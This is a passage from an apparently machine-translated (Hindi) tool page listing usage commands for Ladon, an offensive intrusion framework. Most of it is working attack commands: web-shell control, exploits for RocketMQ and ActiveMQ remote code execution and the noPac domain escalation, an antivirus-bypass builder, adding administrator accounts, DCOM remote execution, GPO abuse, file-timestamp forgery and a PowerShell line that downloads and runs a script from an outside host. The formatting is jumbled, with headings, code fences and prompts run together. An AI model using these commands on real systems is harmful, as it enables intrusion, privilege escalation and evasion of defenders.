Ladon cmdshell http://192.168.50.2:888 cmd whoami 浏览器访问 http://192.168.1.8:800/shell?cmd=whoami

root@kitploit:~
##### 227 डोमेन व्यवस्थापक देखें```Bash
Ladon QueryAdminDomain
228 डोमेन जानकारी देखें```Bash

Ladon QueryDomain

root@kitploit:~
##### 229 MNDP प्रोटोकॉल प्रसारण द्वारा एक ही नेटवर्क खंड में Mikrotik राउटर की जानकारी का पता लगाना```Bash
Ladon MndpInfo
Ladon RouterOS
Ladon Mikrotik
230 PostShell कनेक्शन उपकरण, कस्टम HTTP हेडर सबमिशन का समर्थन करता है```Bash

Ladon PostShell Ladon PostShell POST http://192.168.50.18/post.jsp tom cmd whoami Ladon PostShell POST http://192.168.50.18/post.jsp tom b64cmd d2hvYW1p Ladon PostShell POST http://192.168.50.18/post.jsp tom base64 d2hvYW1p Ladon PostShell UA http://192.168.50.18/ua.jsp tom cmd whoami Ladon PostShell UA http://192.168.50.18/ua.jsp tom b64cmd d2hvYW1p Ladon PostShell UA http://192.168.50.18/ua.jsp tom base64 d2hvYW1p Ladon PostShell Cookie http://192.168.50.18/ck.jsp tom cmd whoami Ladon PostShell Cookie http://192.168.50.18/ck.jsp tom b64cmd d2hvYW1p Ladon PostShell Cookie http://192.168.50.18/ck.jsp tom base64 d2hvYW1p Ladon PostShell Referer http://192.168.50.18/re.jsp tom cmd whoami Ladon PostShell Referer http://192.168.50.18/re.jsp tom b64cmd d2hvYW1p Ladon PostShell Referer http://192.168.50.18/re.jsp tom base64 d2hvYW1p Ladon PostShell Destination http://192.168.50.18/re.jsp tom cmd whoami Ladon PostShell Destination http://192.168.50.18/re.jsp tom b64cmd d2hvYW1p Ladon PostShell Destination http://192.168.50.18/re.jsp tom base64 d2hvYW1p Ladon PostShell HttpBasic http://192.168.50.18/re.jsp tom cmd whoami Ladon PostShell HttpBasic http://192.168.50.18/re.jsp tom b64cmd d2hvYW1p Ladon PostShell HttpBasic http://192.168.50.18/re.jsp tom base64 d2hvYW1p

root@kitploit:~
##### 231 RunCmd/Cmd  Cmd कमांड निष्पादित करें/b64cmd का समर्थन करें```Bash	
Ladon cmd whoami
Ladon b64cmd d2hvYW1p 
232 व्यवस्थापक IP देखें, एक क्लिक में लॉगिन सफलता लॉग 4624 पढ़ें```Bash

Ladon LoginLog Ladon EventLog

root@kitploit:~
##### 233 Apache RocketMQ CVE-2023-33246 दूरस्थ कमांड निष्पादन भेद्यता EXP```Bash	
Ladon RocketMQexp <ip> 10911 <command>
Ladon RocketMQexp 192.168.1.8 10911 "wget http://192.168.1.8/isvul"
234 Ladon एक क्लिक एंटी-किल टूल```Bash

Ladon BypassAV py xor anyNet.exe

root@kitploit:~
##### 235 Win11/2022 प्रणाली विशेषाधिकार को system अनुमति तक बढ़ाना```Bash	
Ladon McpPotato whoami
236 EXE से HEX, CMD कमांड फ़ाइल लिखें```Bash

Ladon Exe2Hex 1.exe

root@kitploit:~
##### 237 EXE को Base64 में बदलें, CMD कमांड से फ़ाइल में लिखें```Bash	
Ladon Exe2B64 1.exe
238 ZimbraVer Zimbra मेल प्रणाली संस्करण का पता लगाना```Bash

Ladon 192.168.1.8/24 ZimbraVer Ladon http://192.168.1.8:8080 ZimbraVer Ladon url.txt ZimbraVer

root@kitploit:~
##### 239 SharpGPO डोमेन प्रवेश समूह नीति पार्श्व संचलन उपकरण```Bash	
Ladon SharpGPO

Ladon SharpGPO --Action GetOU
Ladon SharpGPO --Action GetOU --OUName "IT Support"

Ladon SharpGPO --Action NewOU --OUName "IT Support"
Ladon SharpGPO --Action NewOU --OUName "App Dev" --BaseDN "OU=IT Support,DC=testad,DC=com"

Ladon SharpGPO --Action MoveObject --SrcDN "CN=user01,CN=Users,DC=testad,DC=com" --DstDN "OU=IT Support,DC=testad,DC=com"
Ladon SharpGPO --Action MoveObject --SrcDN "CN=user01,OU=IT Support,DC=testad,DC=com" --DstDN "CN=Users,DC=testad,DC=com"

Ladon SharpGPO --Action RemoveOU --OUName "IT Support"
Ladon SharpGPO --Action RemoveOU --DN "OU=IT Support,DC=testad,DC=com"


Ladon SharpGPO --Action GetGPO
Ladon SharpGPO --Action GetGPO --GPOName testgpo

Ladon SharpGPO --Action NewGPO --GPOName testgpo

Ladon SharpGPO --Action RemoveGPO --GPOName testgpo
Ladon SharpGPO --Action RemoveGPO --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8

Ladon SharpGPO --Action GetGPLink
Ladon SharpGPO --Action GetGPLink --DN "OU=IT Support,DC=testad,DC=com"
Ladon SharpGPO --Action GetGPLink --GPOName testgpo
Ladon SharpGPO --Action GetGPLink --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8

Ladon SharpGPO --Action NewGPLink --DN "OU=IT Support,DC=testad,DC=com" --GPOName testgpo
Ladon SharpGPO --Action NewGPLink --DN "OU=IT Support,DC=testad,DC=com" --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8

Ladon SharpGPO --Action RemoveGPLink --DN "OU=IT Support,DC=testad,DC=com" --GPOName testgpo
Ladon SharpGPO --Action RemoveGPLink --DN "OU=IT Support,DC=testad,DC=com" --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8

Ladon SharpGPO --Action GetSecurityFiltering --GPOName testgpo
Ladon SharpGPO --Action GetSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8

Ladon SharpGPO --Action NewSecurityFiltering --GPOName testgpo --DomainUser Alice
Ladon SharpGPO --Action NewSecurityFiltering --GPOName testgpo --DomainGroup "Domain Users"
Ladon SharpGPO --Action NewSecurityFiltering --GPOName testgpo --DomainComputer WIN-SERVER
Ladon SharpGPO --Action NewSecurityFiltering --GPOName testgpo --NTAccount "Authenticated Users"
Ladon SharpGPO --Action NewSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainUser Alice
Ladon SharpGPO --Action NewSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainGroup "Domain Users"
Ladon SharpGPO --Action NewSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainComputer WIN-SERVER
Ladon SharpGPO --Action NewSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --NTAccount "Authenticated Users"

Ladon SharpGPO --Action RemoveSecurityFiltering --GPOName testgpo --DomainUser Alice
Ladon SharpGPO --Action RemoveSecurityFiltering --GPOName testgpo --DomainGroup "Domain Users"
Ladon SharpGPO --Action RemoveSecurityFiltering --GPOName testgpo --DomainComputer WIN-SERVER
Ladon SharpGPO --Action RemoveSecurityFiltering --GPOName testgpo --NTAccount "Authenticated Users"
Ladon SharpGPO --Action RemoveSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainUser Alice
Ladon SharpGPO --Action RemoveSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainGroup "Domain Users"
Ladon SharpGPO --Action RemoveSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainComputer WIN-SERVER
Ladon SharpGPO --Action RemoveSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --NTAccount "Authenticated Users"
240 IIS वेबसाइट जानकारी एक-क्लिक प्राप्ति```Bash

Ladon IisInfo

root@kitploit:~
##### 241 पैनेट्रेशन टेस्टिंग के लिए समर्पित वेब सर्वर LDAP डीसीरियलाइज़ेशन```Bash	
Ladon web 800 ldap=192.168.1.8:800
242 पैनेट्रेशन-विशिष्ट WEB सर्वर RMI डिसीरियलाइज़ेशन```Bash

Ladon web 800 rmi=192.168.1.8

root@kitploit:~
##### 243 API व्यवस्थापक जोड़ें (सिस्टम net, net1 अक्षम को नजरअंदाज करें)```Bash	
Ladon AddAdmin admin$ 123456
244 API उपयोगकर्ता जोड़ें (सिस्टम net, net1.exe अक्षम को अनदेखा करें)```Bash

Ladon AddUser admin$ 123456

root@kitploit:~
##### 245 API उपयोगकर्ता हटाएं (सिस्टम net, net1.exe अक्षम को अनदेखा करता है)```Bash	
Ladon DelUser admin$
246 Rubeus डोमेन पेनिट्रेशन Kerberos हमले

जैसे TGT अनुरोध/ST अनुरोध/AS-REP Roasting/Kerberoasting/प्रतिनिधि हमले/स्वर्ण टिकट/रजत टिकट/हीरा टिकट/नीलम टिकट आदि```Bash Ladon Rubeus

root@kitploit:~
##### 247 noPac डोमेन घुसपैठ डोमेन के भीतर विशेषाधिकार वृद्धि CVE-2021-42287/CVE-2021-42278```Bash	
CVE-2021-42287/CVE-2021-42278 Scanner & Exploiter

/domain /user /pass argument needed for scanning
/dc /mAccount /nPassword argument needed for exploitation

Examples:
  Ladon.exe noPac scan -domain htb.local -user domain_user -pass 'Password123!'
  Ladon.exe noPac -dc dc02.htb.local -mAccount demo -mPassword Password123!
  Ladon.exe noPac -domain htb.local -user domain_user -pass 'Password123!' /dc dc02.htb.local /mAccount demo /mPassword Password123!
  Ladon.exe noPac -domain htb.local -user domain_user -pass 'Password123!' /dc dc02.htb.local /mAccount demo123 /mPassword Password123! /service cifs /ptt
248 SharpGPOAbuse```Bash

Ladon SharpGPOAbuse

root@kitploit:~
##### 249 SharpSphere vCenter द्वारा प्रबंधित वर्चुअल मशीनों के गेस्ट ऑपरेटिंग सिस्टम के साथ इंटरैक्ट करें कमांड निष्पादित करें```Bash	
Ladon SharpSphere

  No verb selected.

  dump        Snapshot and download memory dump file

  list        List all VMs managed by this vCenter

  execute     Execute given command in target VM

  c2          Run C2 using C3's VMwareShareFile module

  upload      Upload file to target VM

  download    Download file from target VM

  help        Display more information on a specific command.

  version     Display version information.
250 Dcom दूरस्थ कमांड निष्पादन MMC20```Bash

Ladon MmcExec host cmdline Ladon MmcExec 127.0.0.1 calc Ladon MmcExec 127.0.0.1 Y2FsYw==

root@kitploit:~
##### 251 Dcom दूरस्थ कमांड निष्पादन का ShellWindows```Bash	
Ladon ShellExec host cmdline
Ladon ShellExec 127.0.0.1 calc
Ladon ShellExec 127.0.0.1 Y2FsYw==
252 Dcom का दूरस्थ कमांड निष्पादन ShellBrowserWindow```Bash

Ladon ShellBrowserExec host cmdline Ladon ShellBrowserExec 127.0.0.1 calc Ladon ShellBrowserExec 127.0.0.1 Y2FsYw==

root@kitploit:~
##### 253 Smtp Ntlm की जानकारी प्राप्त करें (25, 465, 587 पोर्ट)```Bash	
Ladon 192.168.1.8/24 SmtpInfo
254 HTTP/S Ntlm पहचान प्रणाली जानकारी```Bash

Ladon 192.168.1.8/24 HttpInfo

root@kitploit:~
##### 255 ActiveMQ CVE-2023-46604 RCE Exploit```Bash	
Ladon CVE-2023-46604 -i 192.168.1.8 -u http://192.168.1.1/poc.xml
256 DomainLog DomainUserIP रिमोट डोमेन उपयोगकर्ता IP क्वेरी```Bash
root@kitploit:~
   Ladon DomainLog -d 7
   Ladon DomainLog -h ip -d 7
   Ladon DomainLog -h ip -d 7 -grep user
   Ladon DomainLog -h ip -u username -p password -d 7
   Ladon DomainLog -h ip -u username -p password -d 7 -all
   Ladon DomainLog -h ip -u username -p password -d 7 -f user -o C:\path\res

ult.txt

root@kitploit:~
##### 257 जांचें कि उपयोगकर्ता Lotus व्यवस्थापक है या नहीं```Bash	
Ladon LotusAdmin http://192.168.1.1
Ladon LotusAdmin http://192.168.1.1/adm.nsf
258 HTA सर्वर एक क्लिक से प्रारंभ DOC तक पहुँचने पर भी HTA निष्पादित कर सकता है```Bash

Ladon HtaSer Ladon HtaSer 8080

root@kitploit:~
##### 259 ConfVer ConfluenceVer Confluence संस्करण का पता लगाना```Bash	
Ladon 192.168.1.8/24 ConfVer
Ladon http://192.168.1.8:8080 ConfVer
Ladon url.txt ConfVer
260 FindAD का उपयोग Active Directory उपयोगकर्ता लॉगिन स्थानों को खोजने, डोमेन उपयोगकर्ताओं को गणना करने के लिए किया जा सकता है```Bash

Ladon FindAD Ladon pveFindADUser

root@kitploit:~
##### 261 Oracle डेटाबेस रिमोट विशेषाधिकार वृद्धि उपकरण आधिकारिक ड्राइवर >=.net 4.8```Bash	
Ladon OracleCmd2 192.168.1.8 1521 orcl admin 123456 whoami
262 Oracle डेटाबेस रिमोट विशेषाधिकार वृद्धि उपकरण 3 विधियाँ एक-क्लिक विशेषाधिकार वृद्धि```Bash

Ladon OracleCmd 192.168.1.8 1521 orcl admin 123456 m1 whoami Ladon OracleCmd 192.168.1.8 1521 orcl admin 123456 m2 whoami Ladon OracleCmd 192.168.1.8 1521 orcl admin 123456 m3 whoami

root@kitploit:~
##### BuildCS गतिशील रूप से c# कोड फ़ाइल संकलित करें```Bash	
Ladon BuildCS exe.cs exe
Ladon BuildCS dll.cs dll
Ladon BuildCS exe.cs dat
फ़ाइल समय संशोधित करें, फ़ाइल समय निर्दिष्ट करें

Usage: Ladon UpdateFileTime <file_path> ```Bash Ladon UpdateFileTime E:\Ladon911\Ladon.exe "2024-09-11 09:11:00"

root@kitploit:~
##### फ़ाइल समय संशोधित करें फ़ाइल समय कॉपी करें```Bash
Ladon CopyFileTime E:\Ladon911\LadonExp.exe E:\Ladon911\Ladon.exe

PowerShell संस्करण Ladon.ps1

0x001 Cmd इंटरएक्टिव निष्पादन```Bash

powershell Import-Module .\Ladon.ps1 Ladon OnlinePC

root@kitploit:~
#### 0x002 स्थानीय गैर-संवादात्मक निष्पादन```Bash	
powershell -exec bypass Import-Module .\Ladon.ps1;Ladon whoami
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -exec bypass Import-Module .\Ladon.ps1;Ladon whoami

0x003 दूरस्थ मेमोरी लोडिंग निष्पादन```Bash

powershell -nop -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.8/Ladon.ps1'); Ladon OnlinePC"

root@kitploit:~
#### 0x004 BypassबायपासPowerShellडिफ़ॉल्ट नीति निष्पादन```Bash	
powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon OnlinePC

0x005 कस्टम पोर्ट स्कैनिंग```Bash

powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon PortScan '22,80,135,445'

root@kitploit:~
### Cobalt Strike  Ladon.ps1

CS Beacon जीवित होस्ट का पता लगाना```bash
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon ICMP
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon NbtInfo
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon SmbInfo
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon LdapInfo

CS Beacon कस्टम पोर्ट स्कैनिंग```bash shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon PortScan '22,80,135,445'

root@kitploit:~
CS Beacon MS17010 भेद्यता पता लगाना```bash
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon 192.168.1.1/24 ms17010

उदाहरण

http://k8gege.org/Ladon/example-en.html

नवीनतम संस्करण

नवीनतम संस्करण छोटी सील रिंग में: http://k8gege.org/Ladon/update.txt

समय के साथ स्टारगेज़र्स

समय के साथ स्टारगेज़र्स

टूल डाउनलोड करें